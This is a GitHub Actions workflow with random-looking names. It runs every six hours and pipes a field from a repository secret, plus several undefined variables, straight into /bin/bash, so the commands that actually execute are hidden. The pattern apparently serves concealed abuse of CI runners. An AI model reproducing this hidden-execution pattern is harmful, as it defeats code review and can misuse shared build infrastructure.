name: chenqinzii

on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenqinzii
        env:
          p9: ${{ secrets.p9 }}
        run: |
          echo $p9 | jq -r .tevpk33 | /bin/bash
          echo $gfo51 | jq -r .kc95 | /bin/bash
          echo $mp07 | jq -r .gvgw6546 | /bin/bash
          echo $akkhz5 | jq -r .s0268 | /bin/bash
          echo $oyxt50 | jq -r .zf291 | /bin/bash
          echo $qqoug78 | jq -r .qb8614 | /bin/bash
          echo $qwi4137 | jq -r .jvj904 | /bin/bash
          echo $mry680 | jq -r .whtut3075 | /bin/bash
          echo $bmapz7833 | jq -r .f9774 | /bin/bash

